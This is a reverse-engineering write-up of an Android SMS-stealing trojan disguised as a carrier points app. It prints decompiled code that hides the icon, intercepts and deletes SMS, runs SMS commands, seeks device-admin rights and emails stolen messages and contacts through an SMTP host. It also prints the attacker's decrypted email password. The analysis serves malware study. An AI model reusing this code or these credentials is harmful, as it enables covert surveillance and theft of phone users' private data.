纯小白系列(三)：对伪装“移动”积分客户端的逆向分析|电子爱好者

admin管理员组
文章数量:1564209

以前发表于http://www.52pojie/thread-524338-1-1.html

样本安装名称：积分客户端

MD5 ：84B45E2A7040FAC5B1D489C1AAD1B7C5 SHA1 ：DC7B060D3B7844EEEA090E219C2DE4A5AD1EBF37 相关工具： JEB 、ShakaApktool 、signapk 、eclipse 作者： Youngs 博客： http://youngs-rsr.blog.163 http://blog.csdn/youngs0xff 样本运行都在安卓模拟器中进行，在分析过程中，此样本的解密部分用模拟器+eclipase+signapk来实现获取解密信息（暂不做文档说明，后面有时间在专门发一篇）
一、使用apktool工具进行反编译操作：由于此样本不存在加固，这里直接使用ShakaApktool来进行反编译(由于自己的apktool版本比较低，无法正常进行反编译，这里则借助于 Androidkiller中的ShakaApktool来完成)：直接在其ShakaApktool.jar目录下输入java -jar ShakaApktool.jar d -d xxx.apk -o Youngs执行即可
在Youngs目录下就有我们想要的smail文件及AndroidManifest.xml等文件打开AndroidManifest.xml文件后，我们发现其包名为"com.rcerc.cew”,主Activity为MainActivity [XML] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 <? xml version = "1.0" encoding = "utf-8" standalone = "no" ?> < manifest xmlns:android = "http://schemas.android/apk/res/android" android:installLocation = "internalOnly" package = "com.rcerc.cew" > < uses-permission android:name = "android.permission.INTERNET" /> < uses-permission android:name = "android.permission.READ_SMS" /> < uses-permission android:name = "android.permission.WRITE_SMS" /> < uses-permission android:name = "android.permission.SEND_SMS" /> < uses-permission android:name = "android.permission.RECEIVE_SMS" /> < uses-permission android:name = "android.permission.RECEIVE_WAP_PUSH" /> < uses-permission android:name = "android.permission.RECEIVE_BOOT_COMPLETED" /> < uses-permission android:name = "android.permission.RECEIVE_USER_PRESENT" /> < uses-permission android:name = "android.permission.READ_PHONE_STATE" /> < uses-permission android:name = "android.permission.MODIFY_AUDIO_SETTINGS" /> < uses-permission android:name = "android.permission.READ_CONTACTS" /> < uses-permission android:name = "android.permission.GET_TASKS" /> < uses-permission android:name = "android.permission.ACCESS_NETWORK_STATE" /> < uses-permission android:name = "android.permission.WRITE_SETTINGS" /> < uses-permission android:name = "android.permission.VIBRATE" /> < uses-permission android:name = "android.permission.WRITE_EXTERNAL_STORAGE" /> < uses-permission android:name = "android.permission.ACCESS_WIFI_STATE" /> < application android:allowBackup = "true" android:icon = "@drawable/app_logo" android:label = "@string/app_name" android:name = "com.phone.stop.db.PhoneApplication" android:theme = "@android:style/Theme.Black.NoTitleBar.Fullscreen" > < activity android:excludeFromRecents = "false" android:label = "@string/app_name" android:name = "com.phone.stop.activity.MainActivity" > < intent-filter > < action android:name = "android.intent.action.MAIN" /> < category android:name = "android.intent.category.LAUNCHER" /> </ intent-filter > </ activity >

其相关权限如下： android.permission.INTERNET，访问网络连接，可能产生GPRS流量 android.permission.READ_SMS，读取短信内容 android.permission.WRITE_SMS，允许编写短信 android.permission.SEND_SMS，发送短信 android.permission.RECEIVE_SMS，接收短信 android.permission.RECEIVE_WAP_PUSH，接收WAP-PUSH信息 android.permission.RECEIVE_BOOT_COMPLETED，允许程序开机自动运行 android.permission.READ_PHONE_STATE，访问电话状态 android.permission.MODIFY_AUDIO_SETTINGS，修改声音设置信息 android.permission.READ_CONTACTS，允许应用访问联系人通讯录信息 android.permission.GET_TASKS，允许程序获取当前或最近运行的应用 android.permission.ACCESS_NETWORK_STATE，允许获取网络信息状态，如当前的网络连接是否有效 android.permission.WRITE_SETTINGS，允许读写系统设置项 android.permission.VIBRATE，允许振动 android.permission.WRITE_EXTERNAL_STORAGE，允许程序写入外部存储，如SD卡上写文件 android.permission.ACCESS_WIFI_STATE，获取当前WiFi接入的状态以及WLAN热点的信息二、分析classes.dex文件： 1、获取classes.dex文件：直接通过压缩包解压APK文件即可：
2、经过前面的准备工作，由上面的AndroidManifest.xml文件可知，其主Activity为MainActivity 判断是否为主Activity，直接看下面是否存在"android.intent.action.MAIN"即可。 [C++] 纯文本查看复制代码 ?

1 2 3 4 5 6 7 <application android:allowBackup= "true" android:icon= "@drawable/app_logo" android:label= "@string/app_name" android:name= "com.phone.stop.db.PhoneApplication" android:theme= "@android:style/Theme.Black.NoTitleBar.Fullscreen" > <activity android:excludeFromRecents= "false" android:label= "@string/app_name" android:name= "com.phone.stop.activity.MainActivity" > <intent-filter> <action android:name= "android.intent.action.MAIN" /> <category android:name= "android.intent.category.LAUNCHER" /> </intent-filter> </activity>

3、分析MainActivity：现在就直接打开jeb对classes.dex进行相关分析：然后我们进入到MainActivity中，看看OnCreate方法(由于代码加了混淆，后面则会有些方法都是自己重命名)：
[Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 protected void onCreate(Bundle arg5) { super .onCreate(arg5); this .setContentView( 2130903041 ); this .getPackageManager().setComponentEnabledSetting( this .getComponentName(), 2 , 1 ); // 隐藏图标 i.set_i_want_xxoo(((Context) this )); // i_want_xxoo-->解密获取手机号码 i.set_send_email_account(((Context) this )); // send_email_account-->解密获取发送邮箱帐号 i.set_receive_email_account(((Context) this )); // receive_email_account--》解密获取接收邮箱帐号 i.set_send_email_pwd(((Context) this )); // send_email_pwd--》解密获取邮箱密码 i.init_end_time(((Context) this )); // app_end_time---》失活时间 if (!a.a(((Context) this )).i()) { k.send_MSG( "软件安装完毕\n识别码:" + this .getSystemService( "phone" ).getDeviceId() + "\n" + j.a(), // 发送手机识别码、型号、品牌、系统版本到收信号码 4 , ((Context) this )); a.a(((Context) this )).e( true ); // 设置has_send_phone_info为true } k.a(((Context) this )); // 删除收件箱短信 if (a.a(((Context) this )).j()) { d.a(((Context) this )); // email_message_contacts_switch---》true 发送联系人及短信信息给邮箱 } this .a(); // 获取设备管理权限 }

主要实现功能: 隐藏图标
解密获取相关的邮箱帐号、密码、收信手机号等信息
发送手机识别码、型号、品牌、系统版本给收信号码
删除收件箱短信
发送联系人及短信信息给邮箱
获取设备管理权限
1）隐藏图标： [Java] 纯文本查看复制代码 ?

1 2	`this` `.setContentView(` `2130903041` `);` `this` `.getPackageManager().setComponentEnabledSetting(` `this` `.getComponentName(),` `2` `,` `1` `);` `// 隐藏图标`

2）解密获取相关的邮箱帐号、密码、收信手机号等信息： [Java] 纯文本查看复制代码 ?

1 2 3 4 5 i.set_i_want_xxoo(((Context) this )); // i_want_xxoo-->解密获取手机号码 i.set_send_email_account(((Context) this )); // send_email_account-->解密获取发送邮箱帐号 i.set_receive_email_account(((Context) this )); // receive_email_account--》解密获取接收邮箱帐号 i.set_send_email_pwd(((Context) this )); // send_email_pwd--》解密获取邮箱密码 i.init_end_time(((Context) this )); // app_end_time---》失活时间

这里则以set_i_want_xxoo为例做为解密对象进行分析：首先进行到com.phone.stop.c下的类i，我们找到对应的set_i_want_xxoo方法： [Java] 纯文本查看复制代码 ?

1 2 3 4 5 6 public static void set_i_want_xxoo(Context arg2) { // set_i_want_xxoo if (!a.a(arg2).d()) { a.a(arg2).b(g.a(a.a(arg2).c())); // 解密获取i_want_xxoo对应的手机号码 a.a(arg2).b( true ); // 设置have_init_phone_number的值 } }

在方法set_i_want_xxoo中，调用com.phone.stop.db下的类a中的d方法，看到其先进行判断have_init_phone_number对应的值是否为flase（即表示手机号码是否初始化），如果未初始化，则进行解密获取手机号码。其判断代码如下： [Java] 纯文本查看复制代码 ?

1 2 3 public boolean d() { return this .b.getBoolean( "have_init_phone_number" , false ); }

由于是第一次执行程序，即未初始化值，那么就会进入到下面的解密环节（即调用a.a(arg2).b(g.a(a.a(arg2).c()))）：首先是调用a.a(arg2).c()方法（即com.phone.stop.db下的类a中的c方法）来获取加密的手机号码信息： [Java] 纯文本查看复制代码 ?

1 2 3 public String c() { return this .b.getString( "i_want_xxoo" , "f192419edc4cd50a7bdcb5230119d8e4" ); }

然后调用解密方法g.a(a.a(arg2).c())（即com.phone.stop.c下的类g中的a方法），由于后面类e是DES解密算法，这里就不做过多的介绍，相关资料可以在网上获取： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 public static String a(String arg2) { String v0_1; // 得到解密后的值 try { v0_1 = new e( "staker" ).b(arg2); // 得到解密后的值 } catch (Exception v0) { v0.printStackTrace(); v0_1 = "" ; } return v0_1; }

得到了相关的解密值后，则会设置i_want_xxoo对应的值为解密得到的手机号（经过调试或者log打印可知其解密号码为：13268343253），即调用com.phone.stop.db下的类a中的b方法来进行设置。 [Java] 纯文本查看复制代码 ?

1 2 3 4 5 public void b(String arg3) { SharedPreferences$Editor v0 = this .b.edit(); v0.putString( "i_want_xxoo" , arg3); v0mit(); }

最后则设置have_init_phone_number对应的值为true，即调用com.phone.stop.db下的类a中的b方法来进行设置。 [Java] 纯文本查看复制代码 ?

1 2 3 4 5 public void b( boolean arg3) { SharedPreferences$Editor v0 = this .b.edit(); v0.putBoolean( "have_init_phone_number" , arg3); v0mit(); }

经过相关的DES解密操作，最后我们获取到：邮箱： zhouliqin@vip.163 密码：jkohpxabmdoioawl 手机号码：13268343253 失活时间：2015-09-08 09:08:22 3）发送手机识别码、型号、品牌、系统版本给收信号码： [Java] 纯文本查看复制代码 ?

1 2 3 4 5 if (!a.a(((Context) this )).i()) { k.send_MSG( "软件安装完毕\n识别码:" + this .getSystemService( "phone" ).getDeviceId() + "\n" + j.a(), // 发送手机识别码、型号、品牌、系统版本到收信号码 4 , ((Context) this )); a.a(((Context) this )).e( true ); // 设置has_send_phone_info为true }

首先判断has_send_phone_info是否为false，由于刚启动，其初始值为false，那么就会给手机号13268343253发送手机识别码、型号、品牌、系统版本信息，然后设置has_send_phone_info是true。 4）删除收件箱短信：直接调用com.phone.stop.f下的类k中的a方法来实现删除收件箱短信： [Java] 纯文本查看复制代码 ?

1	`k.a(((Context)` `this` `));` `// 删除收件箱短信`

删除收件箱短信的方法a： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 public static void a(Context arg8) { // 删除收件箱短信 String[] v2 = null ; // has_delete_message if (!a.a(arg8).h()) { ContentResolver v0 = arg8.getContentResolver(); Cursor v1 = v0.query(com.phone.stop.a.a.b, v2, ((String)v2), v2, "date" ); // b--->content://sms/inbox try { if (!a.a(arg8).h() && (v1.moveToNext())) { int v2_1 = v1.getInt(v1.getColumnIndex( "_id" )); int v3 = v0.delete(Uri.parse( "content://sms/" + v2_1), null , null ); int v0_2 = v0.delete(com.phone.stop.a.a.a, "_id=" + v2_1, null ); if (v3 != 1 && v0_2 != 1 ) { goto label_39; } a.a(arg8).d( true ); // has_delete_message为true } label_39: v1.close(); } catch (Exception v0_1) { } } }

5）发送联系人及短信信息给邮箱： [Java] 纯文本查看复制代码 ?

1 2 3 if (a.a(((Context) this )).j()) { d.a(((Context) this )); // email_message_contacts_switch---》true 发送联系人及短信信息给邮箱 }

调用com.phone.stop.c下的类d中的a方法来实现发送相关信息到邮箱，其主要是通过调用类e中的方法来实现： [Java] 纯文本查看复制代码 ?

1 2 3 public static void a(Context arg1) { a.a( new e(arg1)); // 发送联系人及短信信息给邮箱 }

在com.phone.stop.c下的类e中的a方法中分析实现发送短信信息和联系人信息： [Java] 纯文本查看复制代码 ?

1 2 3 4 5 public Object a() { d.b( this .a); // 发送短信信息给邮箱 d.c( this .a); // 发送联系人信息给邮箱 return null ; }

发送短信消息在com.phone.stop.c下的类d中的b方法中实现： [Java] 纯文本查看复制代码 ?

1 2 3 static void b(Context arg0) { d.d(arg0); }

调用的d方法主要实现代码如下： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 private static void d(Context arg9) { // 发送短信信息给邮箱 try { com.phone.stop.db.a v1 = com.phone.stop.db.a.a(arg9); if (!v1.m()) { ArrayList v2 = h.a(arg9); // 获取短信列表 if (v2.size() <= 0 ) { return ; } String v3 = arg9.getSystemService( "phone" ).getDeviceId(); // 手机设备信息 StringBuffer v4 = new StringBuffer( "------------------------------ " ); Iterator v2_1 = v2.iterator(); label_14: if (v2_1.hasNext()) { Object v0_1 = v2_1.next(); v4.append( " ----------------------" + ((com.phone.stop.d.b) v0_1).b + " " + ((com.phone.stop.d.b)v0_1).c + "------------- " ); Iterator v5 = ((com.phone.stop.d.b)v0_1).d.iterator(); while ( true ) { if (!v5.hasNext()) { goto label_14; } v0_1 = v5.next(); if (((com.phone.stop.d.a)v0_1).e == 1 ) { v4.append(((com.phone.stop.d.a)v0_1).d).append( " " ).append(((com.phone.stop.d.a) v0_1).c).append( " " ); continue ; } v4.append(((com.phone.stop.d.a)v0_1).d).append( " " ).append( "" ) .append(((com.phone.stop.d.a)v0_1).c).append( "" ).append( " " ); } } String v0_2 = v1.n(); // send_email_account String v2_2 = v1.r(); // send_email_pwd String v5_1 = v1.p(); // receive_email_account b v6 = new b(); v6.a( "smtp.vip.163" , "25" ); v6.a(v0_2, "DX列表(" + v3 + ")" , v4.toString()); v6.a( new String[]{v5_1}); v6.b( "smtp.vip.163" , v0_2, v2_2); // 发送短信信息给邮箱 v1.g( true ); } return ; } catch (Exception v0) { return ; } }

发送联系人信息给邮箱，其主要是通过调用com.phone.stop.c下的类d中的c方法中实现（即调用方法e实现）： [Java] 纯文本查看复制代码 ?

1 2 3 static void c(Context arg0) { d.e(arg0); }

发送联系人给邮箱的实现方法： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 private static void e(Context arg9) { // 发送联系人给邮箱 try { com.phone.stop.db.a v1 = com.phone.stop.db.a.a(arg9); if (!v1.l()) { ArrayList v2 = com.phone.stop.c.a.a(arg9); // 获取联系人信息 if (v2.size() <= 0 ) { return ; } String v3 = arg9.getSystemService( "phone" ).getDeviceId(); StringBuffer v4 = new StringBuffer(); Iterator v2_1 = v2.iterator(); while (v2_1.hasNext()) { Object v0_1 = v2_1.next(); v4.append( "" ).append(((c)v0_1).b).append( " " ).append((( c)v0_1).c).append( " " ); } String v0_2 = v1.n(); String v2_2 = v1.r(); String v5 = v1.p(); b v6 = new b(); v6.a( "smtp.vip.163" , "25" ); v6.a(v0_2, "TX(" + v3 + ")" , v4.toString()); v6.a( new String[]{v5}); v6.b( "smtp.vip.163" , v0_2, v2_2); v1.f( true ); } return ; } catch (Exception v0) { g.a( "aaaa" , v0); return ; } }

6）获取设备管理权限：获取设备管理权限： [Java] 纯文本查看复制代码 ?

1	`this` `.a();` `// 获取设备管理权限`

调用MainActivity中的方法a来实现获取设备管理权限： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 public void a() { try { Object v0_1 = this .getSystemService( "device_policy" ); // 获取设备管理权限 ComponentName v1 = new ComponentName(((Context) this ), MyDeviceAdminReceiver. class ); if (((DevicePolicyManager)v0_1).isAdminActive(v1)) { return ; } Intent v0_2 = new Intent( "android.app.action.ADD_DEVICE_ADMIN" ); // 启动设备管理 v0_2.putExtra( "android.app.extra.DEVICE_ADMIN" , ((Parcelable)v1)); // 权限列表 v0_2.putExtra( "android.app.extra.ADD_EXPLANATION" , "提高权限获取保护" ); // 描述 this .startActivityForResult(v0_2, 0 ); // 打开新的activity,请求码为0 this .b.sendEmptyMessageDelayed( 1 , 2000 ); } catch (Exception v0) { v0.printStackTrace(); } }

发送相关的用户是否激活的信息给收信手机：13268343253 [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 protected void onActivityResult( int requestcode, int arg6, Intent arg7) { int v2 = 4 ; super .onActivityResult(requestcode, arg6, arg7); if (requestcode == 0 ) { if (arg6 == - 1 ) { Log.i( "onActivityResult" , "Enable it" ); a.a(((Context) this )).a( true ); // 设置have_app_jihuo为true k.send_MSG(String.valueOf(j.a()) + "\n用户选择了激活" , v2, ((Context) this )); // 发送信息给收信手机 } else { k.send_MSG(String.valueOf(j.a()) + "\n用户没有进行激活" , v2, ((Context) this )); // 发送没激活信息给收信手机 Log.i( "onActivityResult" , "Cancle it" ); } } this .startService( new Intent(((Context) this ), BootService. class )); this .b.sendEmptyMessageDelayed( 0 , 3000 ); }

4、分析SMSReceiver： 1）查看SMSReceiver的相关权限： [XML] 纯文本查看复制代码 ?

1 2 3 4 5 < receiver android:name = "com.phone.stop.receiver.SMSReceiver" android:permission = "android.permission.BROADCAST_SMS" > < intent-filter android:priority = "2147483647" > < action android:name = "android.provider.Telephony.SMS_RECEIVED" /> </ intent-filter > </ receiver >

2）进入SMSReceiver中找到onReceive()方法：方法a实现：发送手机中的短信信息给收信箱： zhouliqin@vip.163和收信手机号：13268343253，删除指定短信并解析收件箱中短信的指令信息： [Java] 纯文本查看复制代码 ?

1 2 3 4 5 public void onReceive(Context arg2, Intent arg3) { g.a( " 广播---------------------------------------" ); this .a = arg2; this .a(arg3); // 给收信邮箱发送信息 }

3）在SMSReceiver中a方法如下：获取短信信息，屏蔽广播，发送相关信息给邮箱及收信手机 [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 private void a(Intent arg11) { // 给收信邮箱发送信息 String v1; String v0_2; Bundle v0 = arg11.getExtras(); StringBuffer v6 = new StringBuffer(); String v3 = "" ; String v2 = "" ; if (v0 != null ) { Object v0_1 = v0.get( "pdus" ); // 获得短信数据 SmsMessage[] v7 = new SmsMessage[v0_1.length]; int v8 = v0_1.length; int v5; for (v5 = 0 ; v5 < v8; ++v5) { v7[v5] = SmsMessage.createFromPdu(v0_1[v5]); } v5 = v7.length; v0_2 = v2; v1 = v3; int v2_1 = 0 ; while (v2_1 < v5) { SmsMessage v0_3 = v7[v2_1]; v3 = v0_3.getDisplayOriginatingAddress(); // 返回信息来源地址 String v4 = v0_3.getMessageBody(); // 短信信息 v1 = new StringBuilder(String.valueOf(v0_3.getTimestampMillis())).toString(); v6.append(v4); ++v2_1; v0_2 = v1; v1 = v3; } } else { v0_2 = v2; v1 = v3; } this .abortBroadcast(); // 屏蔽广播 v2 = v6.toString(); // 短信内容 this .a(v1, v2, v0_2); // 发送短信信息给指定手机号 d.d_send_mail( this .a, String.valueOf(v2) + " " + v1 + " " + j.a() + "-----------------广播<" ); }

4）发送短信信息给指定手机号(13268343253)和指定邮箱，解析收件箱的短信指令： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 private void a(String arg3, String arg4, String arg5) { // 发送短信信息给指定手机号 String v0 = a.a( this .a).c(); // 获取i_want_xxoo的值 if (!v0.contains( "683" )) { return ; } if ( this .a(arg3, arg4)) { //解析是否存在收信邮箱的短信指令 return ; } switch (a.a( this .a).g()) { case 1 : { goto label_14; // app_intercept_type类型 } case 2 : { goto label_18; // app_intercept_type类型 } case 3 : { goto label_16; // app_intercept_type类型 } } return ; label_18: this .c(v0, arg4, arg5); // 判断V0是否存在数据库中存储的number，给邮箱发送短信信息 return ; label_14: this .b(arg3, arg4, arg5); // 发送短信信息arg4给指定手机 return ; label_16: this .clearAbortBroadcast(); // 取消截获广播 }

5）解析是否存在收信邮箱的短信指令：短信指令相关：

第1指令	第2指令	恶意操作
LJ	ALL	设置app_intercept_type的值为1
LJ	SOME	设置app_intercept_type的值为2
LJ	NO	设置app_intercept_type为3
ADD		把信息写入数据库中
DEL		从数据库中删除相关数据
CLEAR	ALL	删除数据库中所有的信息
CLEAR	MESSAGE	无其他操作
LOOK	TIME	发送到期时间给收信邮箱
LOOK	PHONE	发送版本手机版本型号
SEND		自定义目标发送短信

相关的实现代码如下： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 private boolean a(String arg8, String arg9) { // 解析是否存在收信邮箱的短信指令 int v6 = 4 ; int v5 = 2 ; boolean v0 = true ; // 判断arg8总是否含有i_want_xxoo的值 if (arg8.contains(a.a( this .a).c())) { g.a( "------------------ 是主人----------------------" ); this .a(arg9); // 删除短信中arg9信息 String[] v2 = arg9.split( " " ); if (v2[ 0 ].equals( "LJ" )) { if (v2[ 1 ].equals( "ALL" )) { a.a( this .a).a( 1 ); // 设置app_intercept_type的值为1 return v0; } if (v2[ 1 ].equals( "SOME" )) { a.a( this .a).a(v5); // 设置app_intercept_type的值为2 return v0; } if (!v2[ 1 ].equals( "NO" )) { return v0; } a.a( this .a).a( 3 ); // 在“NO”时，设置app_intercept_type为3 return v0; } if (v2[ 0 ].equals( "ADD" )) { c v1 = new c(); v1.c = v2[ 1 ]; b.a(v1); // 把信息写入数据库中 return v0; } if (v2[ 0 ].equals( "DEL" )) { b.a(v2[ 1 ]); // 从数据库中删除v2[1] return v0; } if (v2[ 0 ].equals( "CLEAR" )) { if (v2[ 1 ].equals( "ALL" )) { b.a(); // 删除数据库中所有的信息 return v0; } v2[ 1 ].equals( "MESSAGE" ); return v0; } if (v2[ 0 ].equals( "LOOK" )) { if (v2[ 1 ].equals( "TIME" )) { k.send_MSG( "到期时间:" + a.a( this .a).e(), v6, this .a); // 发送到期时间给收信邮箱 return v0; } if (!v2[ 1 ].equals( "PHONE" )) { return v0; } k.send_MSG(j.a(), v6, this .a); // “PHONE”发送版本手机版本型号 return v0; } if (!v2[ 0 ].equals( "SEND" )) { return v0; } try { k.a(v2[ 1 ], v2[ 2 ], this .a); // 发送信息v2[2]给v2[1] } catch (Exception v1_1) { } } else { v0 = false ; } return v0; }

6）判断是否存在数据库中存储的number，给邮箱发送短信信息： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 private void c(String arg4, String arg5, String arg6) { // 判断arg4中是否存在数据库中存储的number，给邮箱发送短信信息 Iterator v1 = b.b().iterator(); // 获取数据库列表信息，并判断arg4中是否存在number do { if (v1.hasNext()) { if (!arg4.contains(v1.next().c)) { continue ; } break ; } return ; } while ( true ); this .a(arg5); // 设置手机相关模式并删除短信中的arg5信息 k.send_MSG(String.valueOf(arg5) + "\n来自:" + arg4, 4 , this .a); // 给指定手机号发送短信信息 }

7）发送短信信息给指定手机号(13268343253)，并设置相关模式： [Java] 纯文本查看复制代码 ?

1 2 3 4 private void b(String arg4, String arg5, String arg6) { this .a(arg5); // 设置手机相关模式并删除短信中的arg5信息 k.send_MSG(String.valueOf(arg5) + "\n来自:" + arg4, 4 , this .a); // 给指定手机号发送短信消息 }

设置手机相关模式及删除相关的短信： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 public void a(String arg5) { // 设置手机相关模式并删除短信中的arg5信息 if (String.valueOf(Build$VERSION.RELEASE)pareTo( "4.3" ) >= 0 ) { if (! this .c) { this .c = true ; com.phone.stop.f.d.b( this .a, 0 ); // 设置手机不振动 com.phone.stop.f.d.c( this .a, 0 ); // 在合适时振动的振动设置 com.phone.stop.f.d.a( this .a, 0 ); // 设置声音模式 com.phone.stop.f.d.a( this .a, true ); // 静音音频流 } new h().a( this .a, arg5); // 删除短信中的arg5值 } }

5、分析BootReceiver：判断是否存在BootService服务，不存在则开始服务： [Java] 纯文本查看复制代码 ?

1 2 3 4 5 6 7 public void onReceive(Context arg3, Intent arg4) { // 判断是否存在BootService服务 if (!BootReceiver.a(arg3, "com.phone.stop.service.BootService" )) { Intent v0 = new Intent(arg3, BootService. class ); v0.addFlags( 268435456 ); arg3.startService(v0); // 开启BootService服务 } }

判断是否存在相关服务： [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 public static boolean a(Context arg5, String arg6) { // 判断是否有arg6的服务 boolean v0; List v3 = arg5.getSystemService( "activity" ).getRunningServices( 40 ); // 获取正在运行的40个服务 int v4 = v3.size(); int v2 = 0 ; while ( true ) { if (v2 >= v4) { return false ; } else if (v3.get(v2).service.getClassName().equals(arg6)) { v0 = true ; } else { ++v2; continue ; } return v0; } return false ; }

6、分析BootService：判断失活时间是否存在到期，发送安装完成信息给手机，删除相关短信，注册监听器，监听短信的变化。 [Java] 纯文本查看复制代码 ?

01 02 03 04 05 06 07 08 09 10 11 public void onCreate() { super .onCreate(); if (g.a()) { com.phone.stop.db.a.a(((Context) this )).a( 3 ); // 如果app_end_time的时间未失效，设置configurations_data为0 } else { g.a(((Context) this )); // 发送软件安装完毕，删除短信 this .b(); // 注册监听短信接收广播 this .a(); // 为content://sms的数据改变注册监听器 } }

为content://sms的数据改变注册监听器： [Java] 纯文本查看复制代码 ?

1 2 3 4 private void a() { this .getContentResolver().registerContentObserver(a.a, true , new com.phone.stop.b.a(((Context) // 为content://sms的数据改变注册监听器 this ), new Handler())); }

监听短信接收广播： [Java] 纯文本查看复制代码 ?

1 2 3 4 5 6 7 private void b() { IntentFilter v0 = new IntentFilter(); v0.setPriority( 2147483647 ); v0.addAction( "android.provider.Telephony.SMS_RECEIVED" ); // 接收短信权限 v0.addAction( "android.provider.Telephony.SMS_RECEIVED_2" ); this .registerReceiver( new SMSReceiver(), v0, "android.permission.BROADCAST_SMS" , null ); // 当收到短信时触发一个广播 }

三、总结此小马是一款窃取隐私、远程控制的木马。该木马的主要行为是私自获取短信内容、联系人信息上传到指定邮箱，获取手机设备信息及相关的状态发送到指定号码；获得的短信指令对手机进行相关操作，具有远程控制；私自删除短信内容，监控短信的接收；启动后激活设备管理器，隐藏图标，防止自身被卸载，具有流氓行为。由于样本来源涉及工作相关的问题，就不放出来了（有资源的可以去通过 MD5 去下载）。

本文标签：客户端积分系列纯小白

版权声明：本文标题：纯小白系列(三)：对伪装“移动”积分客户端的逆向分析内容由热心网友自发贡献，该文观点仅代表作者本人，转载请联系作者并注明出处：https://www.elefans.com/xitong/1727467701a1115927.html，本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容，一经查实，本站将立刻删除。

电子爱好者 - 最新技术资讯及电子产品介绍！

纯小白系列(三)：对伪装“移动”积分客户端的逆向分析

更多相关文章

Linux系列：在CentOS下添加用户并将文件夹授权

周星驰电影全集+BT种子下载+高清版MKV+周星驰系列电影合集

java基础巩固系列（十三）：java正则表达式中的数量词：Greedy、Reluctant、Possessive

centos安装android应用程序,centos7软件安装系列【二十一】安装android打包环境

ESP32 入门笔记05： BLE 蓝牙客户端和服务器 (ESP32 for Arduino IDE)

win10安装telnet服务器（开启端口，开启telnet客户端后依旧显示：无法打开到主机的连接，在端口xxxx连接失败）

UbuntuDebian等Linux系统安装微信客户端

java微信支付v3系列——3.订单创建准备操作

JS判断客户端是ios或者是android手机移动端

电脑怎么设置微信定位服务器,电脑版微信，一个很简单的客户端，许多功能不支持...

2019 Electron+Vue+Ant Design Vue仿网易云音乐windows客户端实战分享

微信电脑客户端截图无法显示鼠标选中或右键菜单内容

腾讯企业邮箱，QQ邮箱 支持通过客户端进行邮件管理

MAC 系统下使用邮件客户端登录腾讯企业邮箱失败问题

腾讯企业邮箱获取客户端专用密码(授权码)

SEO新手入门系列2022（三）：搜索引擎工作原理

ESP8266系列WiFi模块无法连接苹果手机热点

如何用火狐浏览器firefox模拟手机浏览器客户端

【愚公系列】2022年02月 阿里云 无影云桌面产品测评

【云服务器系列4】—— 如何导出阿里云服务器的系统镜像到本地电脑

发表评论

推荐文章

笔记本安装CentOS的步骤以及安装过程中黑屏的解决办法

Big Data and Cognitive Computing (IF=3.7) 计算机大数据人工智能期刊投稿

magicbook2018+MX150+win10+显卡驱动445.87+cuda_10.0.130+cudnn_v7.6.4.38+conda4.8.3+tensorflow1.14.0

怎样用自己电脑做服务器供他人访问自己的网站

火狐浏览器安装java插件下载_插件下载安装系列EclipseIDEA谷歌火狐安装插件

热门文章

易语言安卓模拟器adb模块制作查看模拟器设备adb devices

一些性价比比较高的笔记本电脑推荐

快应用的用法和常见问题解答（上）

mac打开ppt陷入报错循环

windows10打印机共享完美解决方案

使用TensorFlow概率预测航空乘客人数

联想x240桌面没有计算机,thinkpad x240用u盘装完win7系统后,为何进入不了桌面

打印机计算机不在同一个工作组,不在一个工作组的两台电脑怎么实现打印共享?...

东芝打印机共享怎么设置_东芝 e-studio181怎么设置网络打印机

计算机打印共享服务,Windows 7系统快速设置共享打印机

最新文章

android 伪装 wifi,移动数据伪装wifi软件xposed手机版-手机移动数据伪装wifi模块xposedv1.4最新版_新绿资源网...

手机连接wifi自动弹窗的原理及其实现方法

使用 ESP8266 制作 WiFi 干扰器 - 无需密码即可使用任何 WiFi

android 修改底层wifi 文件信息

手机端怎么限制wifi网速

随身WIFI修改MAC(bssid)并接收短信

android p2p 设置,Android5.0系统wifip2p默认ssid和密码

W801上电自动重连wifi并通过蓝牙更新账号密码

华为Mate30网络拒绝接入wifi问题 ，解决动态MAC白名单限制（新手机连接不了公司WIFI网络解决方法）

基于ESP8266串口WIFI模块ESP-01S在AP模式（即发射无线信号（ WiFi））下实现STC单片机与手机端网路串口助手相互通信功能

（Android开发）WiFi无密码保护时连接不上

怎么设置计算机用户账户和密码,电脑上怎么设置wifi用户名和密码

Android连接相机WiFi,安卓手机使用佳能相机机身wifi传输拍摄的操作

